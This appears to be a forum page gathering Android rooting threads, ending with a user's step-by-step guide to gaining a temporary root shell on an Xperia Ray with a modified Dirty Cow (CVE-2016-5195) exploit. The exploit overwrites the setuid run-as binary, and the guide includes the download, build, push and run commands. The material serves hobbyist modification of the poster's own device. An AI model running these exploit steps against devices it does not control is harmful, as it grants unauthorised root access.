Backup TA/DRM partition with "Dirty Cow" exploit? - Sony Xperia X Questions & Answers

Recently, an exploit to the Linux kernel called "dirty cow" was released. If I understand correctly, it does not allow for temp root because SELinux blocks access to some system resources, even if the shell is running as root. However, would the root shell be privileged enough to grab a copy of the TA partition (also known as the DRM partition) before unlocking the bootloader?

Very good question! And for a similar train of thought, couldn't the root shell be used to get permanent root without unlocking the BL?

Saving TA would be very nice

I don't have (for the moment) Xperia X, but I've read something that I think you/we can try/modify/do some magic with.
Just here
It use Linux and Android NDK, but maybe, with some tinkering and skill it can temp root Xperia X (or other) in order to backup TA key

edit: nevermind

Now it is possible to backup the TA image using the dirtycow exploit
http://forum.xda-developers.com/crossdevice-dev/sony/universal-dirtycow-based-ta-backup-t3514236

Related

Root access

Hello,
I only want to install some apps from the market (setcpu, market enabler and root explorer,...) that requiers root access.
So what do I have to do? Is it enough if I just unlock my bootloader with the tool on htcdev.com?
Which way of rooting my device would you recommend me?
I use an evo 3d gsm (eu version).
thx for the help
Honestly I go with the root posted here in xda, my friend rooted with the HTC method and has had some wierd stuff going on ( no roaming or 3g) I've had my phone rooted with the method given here on xda and haven't got any problems.
MettlerNikola said:
Hello,
I only want to install some apps from the market (setcpu, market enabler and root explorer,...) that requiers root access.
So what do I have to do? Is it enough if I just unlock my bootloader with the tool on htcdev.com?
Which way of rooting my device would you recommend me?
I use an evo 3d gsm (eu version).
thx for the help
Click to expand...
Click to collapse
The main limitation to modifying anything on our device is the internal memory write protection HTC has installed.
There is a temporary method, which will work on previous system software versions to get root acccess, traditional out of bounds exploit, fre3vo.
This will have to be run after each boot to get root access as it does not unlock the internal memory write protection, hence the term temporary root.
In order to unlock the internal memory write protection, so our modifications to the system persist past reboot, we have to run of two unlock methods, revolutionary or htc.
Personally, I ran revolutionary and will probably still continue to do so as it unlocks more of the internal memory more of the time.
If you're looking to follow the *official* route, you'll probably want to use the HTC method. This method is semi new and I haven't personally used it. I only speak from experienced gained through others posting their experiences. If I leave something out, I'm sure somebody will correct me.
The official htc dev method should unlock the write protection at least while in the bootloader and fastboot mode where you can flash a custom recovery and/or custom kernel. Once you have a custom recovery loaded, you can boot into recovery mode, where the internal memory write protection on the /system partition is disabled and make changes to the system, i.e. install an su binary or Superuser.apk (has its own su binary) to provide root access to Android applications.
After you've installed either the su binary, or the Superuser.apk, my application called Root Check is free in the android market and the advanced mode will provide all the details either confirming a proper installation or highlighting the area with issues.
I'm sure there is a guide around here .. I probably should have linked to it rather than write out the process ... lol
Hope that helps and best of luck!
Assuming you have the 1.5 HBoot? If so I dont really know anything about that...I wouldnt use HTCs method.
If you have an Hboot before 1.5 just use unrevolked.
S-Off does not mean you have root BTW it just means you can flash stuff. Once you have S-Off you have to flash super user to get root access.

Question about rooting

Is rooting mean really exploiting a Kernel vulnerability to gain root access?
If there are no vulnerabilities, no root access?
why doesn't Android allow root access by default like other Linux or windows...
silvercats said:
Is rooting mean really exploiting a Kernel vulnerability to gain root access?
If there are no vulnerabilities, no root access?
Click to expand...
Click to collapse
No, not really. Using a vulnerability is only needed when the manufacturer not allows you to root your device, i.e. using a locked bootloader not possible to unlock.
silvercats said:
why doesn't Android allow root access by default like other Linux or windows...
Click to expand...
Click to collapse
Because buying a phone, and the manufacturer guarantees not only the functionality of the hardware, but of the software as well. This is the difference compared to an ordinary computer. If you could modify the software in the device, the manufacturer would no longer be able to guarantee its function.
Another reason is DRM - for this to be work safely (for the rights owner), the device must be tamper proof. This is why many manufacturers allowing unlocking at the same time erases any DRM information from the phone.

[Question] Root acces withoud modifying system partitions?

i'm working on a home project, to backup forensic android partitions for data recovery.
I already concluded that I need root access. so I have researched things that could achieve this goal.
Kingroot - Out of the running, bloatware etc..
SuperSu - Closed source ...
Magisk - needs to adjust the boot loader
Questions:
- Are there other ways to get forensic partition copy's from android phones?
- Are there other ways to recover deleted files from android phone's

Any idea how to root an OPPO A77 CPH1715 phone?

Sorry if a similar thread has been made, but I cannot find any guide to rooting this damn thing that doesn't involve sketchy one-click-root apps. Any help would be greatly appreciated.
Follow-up question: I did some more digging around on Google and found this:
www(dot)getdroidpro(dot)com/oppo-a77-mediatek-root-via-magisk/
Is this legit?
Forget all the so-called One-click-Root apps: they are known to be spyware. If used and in fact working then take note they modify Android's /system partition what easily can get detected.
In contrast to that Magisk uses a systemless strategy for rooting, meaning that your device's Android will be rooted without any alterations or changes being made to the /system partition. In fact, /system is not even mounted r/w by Magisk. This is accomplished by Android's boot image patching. The bad thing, IMHO, is that you have to install TWRP, too, in order to install Magisk.
Finally: Magisk is a hacker tool, in Google's point of view it's NOT legit.
jwoegerbauer said:
Forget all the so-called One-click-Root apps: they are known to be spyware. If used and in fact working then take note they modify Android's /system partition what easily can get detected.
In contrast to that Magisk uses a systemless strategy for rooting, meaning that your device's Android will be rooted without any alterations or changes being made to the /system partition. In fact, /system is not even mounted r/w by Magisk. This is accomplished by Android's boot image patching. The bad thing, IMHO, is that you have to install TWRP, too, in order to install Magisk.
Finally: Magisk is a hacker tool, in Google's point of view it's NOT legit.
Click to expand...
Click to collapse
Hey thanks a lot, I'll take this to assume Magisk is a decent way to go about the rooting process.

Most transparent way to run root shell on Xperia Ray (ST18i), 4.0.4 ICS, 4.1.B.1.13

Dear everyone,
Since my Xperia Ray has grown too old to run some apps I need, I'm moving over to a Z3 compact. Instead of figuring out how to backup and move each app, I'd like to use "adb backup". This requires BackupRestoreConfirmation.apk, which Sony excluded from its stock ROM. I've extracted the corresponding .apk and .odex from a system image and would like to install it on the Ray (by copying it to /system/app).
For this I need a root shell. I'd like to know what's the best way to get a root prompt on the Xperia Ray.
My criteria would be as follows:
Runs on the ST18i stock ROM (4.1.b.1.13, Android 4.0.4, Kernel 2.6.32-9)
No need to unlock the bootloader or flash anything
No need for a Windows machine
Understandable, "transparent", not a precompiled binary/app that could do other things under the hood
There are many threads on rooting this device, but many are dated, so there may be better ways by now that are not specific to the ST18i. There are also several one-click tools which are not transparent at all (and often require Windows).
I already did my research and found the following:
zergRush: only applies to Android 2.1-2.3
[04/Jan][ROOTING/UNROOTING] DooMLoRD's Easy Rooting Toolkit [v4.0](zergRush Exploit)
UPDATE: added v4, with newest zergRush binary (21 Nov 2011) and few corrections/additions to script UPDATE: most companies are patching the exploit in the latest firmwares (Samsung, Motorola, Sony Ericsson, etc) UPDATE: added v3, with newest...
forum.xda-developers.com
[Daily Update]Root / Unroot Sony Ericsson Xperia 2011 v1.5 without unlock bootloader
This is software i wrote to gift my friend and for vietnamese but i think should share here for easy to install all in one solution. My post translated by google so some silly words can be there Don't mind about that ! All credit for DooMLoRD ...
forum.xda-developers.com
Rooting xperia mini/mini pro+more devices without unlocking bootloader
Rooting sony ericsson xperia mini/mini pro without unlocking bootloader: This method is claimed to work "for all phones of Samsung, Sony, HTC, Motorola, LG Goole Nexus and more!" i ve only tried it for sony ericsson xperia mini (my current...
forum.xda-developers.com
eroot: supposedly explained on eroot.me, but that web site is dead
{{NEW}} One Click Root [4.1.B.0.587/.431/ 4.0.2.A.0.62] All 2011 Xperias
Hi folks Here is how to root any 2011 Xperia running any of the 4.1.B.0.587 4.1.B.0.431 / 4.1.A.0.562 and 4.0.2.A.0.62 firmware . No need to downgrade kernels or anything, just root it straight away :D Rooting Go to settings > Security >...
forum.xda-developers.com
One Key ROOT For lt26i ,lr26ii 2.55 Firmwares with locked bootloader。:fingers-c
One Key ROOT For lt26i ,lr26ii 2.55 Firmwares with locked bootloader。:fingers-c One Key ROOT For lt26i ,lr26ii 2.55 Firmwares with locked bootloader。:fingers-crossed::fingers-crossed...
forum.xda-developers.com
iroot: intransparent, seems to install additional software
Download iRoot For PC v1.8.9.21144 (Latest Version) | Root My Device
Download iRoot for PC v1.8.9.21144 (latest version) from here, install it on your Windows computer and root your Android device easily.
rootmydevice.com
towelroot, kingroot, kingoroot: intransparent, sometimes considered malware
framaroot: not listed among supported devices
[Sticky] [Framaroot] Supported devices
Please give feedback about your successfully rooted devices in this thread. When you post, simply give the name of your device and the exploit name you have used. Compatibility for Qualcomm devices (Gandalf exploit only) : ASUS Memopad FHD 10...
forum.xda-developers.com
ln -s /data /data/local/tmp: very neat and understandable, but requires /data/local to be writeable and /data/local.prop to be missing, both of which is not given on my device
Full Disclosure: Re: debugfs exploit for a number of Android devices
seclists.org
adb restore remount timing issue: requires "adb backup" to work, which is not given on my device
Root MANY ANDROID! [Upd: 20.07.2014] - Updated: New Z2 Root by CubeandCube
Hi, i made a small script which is able to root ICS/JB phones. It uses a remount timing issue in Androids "adb restore" service. So normally it should work on nearly all ICS/JB devices, for some it won't but the idea may work in a slightly...
forum.xda-developers.com
adb restore directory traversal: again requires "adb backup" to work, which is not given on my device
Full Disclosure: Android ICS "adb restore" directory traversal vulnerability
seclists.org
mempodipper / mempodroid: requires kernel 2.6.39 or above, which is not given on my device
GitHub - saurik/mempodroid
Contribute to saurik/mempodroid development by creating an account on GitHub.
github.com
DirtyCow: I'd consider this transparent enough if I compile things myself, any idea whether this works?
GitHub - timwr/CVE-2016-5195: CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android - GitHub - timwr/CVE-2016-5195: CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
github.com
GitHub - j0nk0/GetRoot-Android-DirtyCow: Get temporary root by exploiting the dirtycow vulnerability.
Get temporary root by exploiting the dirtycow vulnerability. - GitHub - j0nk0/GetRoot-Android-DirtyCow: Get temporary root by exploiting the dirtycow vulnerability.
github.com
Since there are one-click tools, there ought to be a way that works, but I'd prefer to know what exploit they'd use for this device and then do it myself. I hope some of you can recommend an exploit!
Thanks a lot and A Happy New Year!
Hm, seems the user base is smaller than I expected
For posteriority, I can report that it's possible to get a temporary root shell using the Dirty Cow vulnerability. However, the proof of concept from https://github.com/timwr/CVE-2016-5195 does not work out of the box. It tries to overwrite /system/bin/run-as (a setuid root binary) with a new binary that spawns an interactive shell. This is a pretty large patch (trying to write about 62 kilobytes), and on my (slow) phone the exploit only managed to write small portions of it. I changed parts of the exploit to skip unneeded writes and not end too early, getting it to succeed: https://github.com/timwr/CVE-2016-5195/pull/99
Steps to reproduce (from a Linux terminal):
Download and extract the modified exploit from https://github.com/f0k/CVE-2016-5195/archive/more-efficient.zip:
Bash:
wget https://github.com/f0k/CVE-2016-5195/archive/more-efficient.zip
unzip -d /tmp more-efficient.zip
Download and extract the Android NDK from https://dl.google.com/android/repository/android-ndk-r14b-linux-x86_64.zip and put it on your path:
Bash:
wget https://dl.google.com/android/repository/android-ndk-r14b-linux-x86_64.zip
unzip -d /tmp android-ndk-r14b-linux-x86_64.zip
export PATH="$PATH:/tmp/android-ndk-r14b"
Attach the phone via USB, make sure USB debugging is enabled and adb can see the device (adb devices)
Compile the exploit:
Bash:
cd /tmp/CVE-2016-5195-more-efficient/
make build
It will query your device via adb for the correct architecture and SDK version.
Push it to the device and run it:
Bash:
adb push libs/*/dirtycow /data/local/tmp/dcow
adb push libs/*/run-as /data/local/tmp/run-as
adb shell
cd /data/local/tmp/
cat /system/bin/run-as run-as-original
chmod 777 dcow
./dcow run-as /system/bin/run-as --no-pad
(Or just run make root, if you don't need to know what is going on.)
If you now run run-as on the device (adb shell run-as), it will spawn a root shell. There are no further obstacles on the Xperia Ray's stock ICS ROM, you can mount -o rw,remount /system and modify the system partition, or whatever floats your boat. At least if you do not remount the system partition as writeable, the exploit should be temporary, so rebooting should restore the original /system/bin/run-as. Otherwise you may want to restore it via cat /data/local/tmp/run-as-original > /system/bin/run-as from a root shell.
Hope this helps someone from the future working with similarly outdated phones! According to Wikipedia, any phone with a Linux kernel between 2.6.22 and 4.8.3 / 4.7.9 / 4.4.26 is affected by DirtyCow, but if your device has SELinux, overwriting a setuid binary will not be enough.

Categories

Resources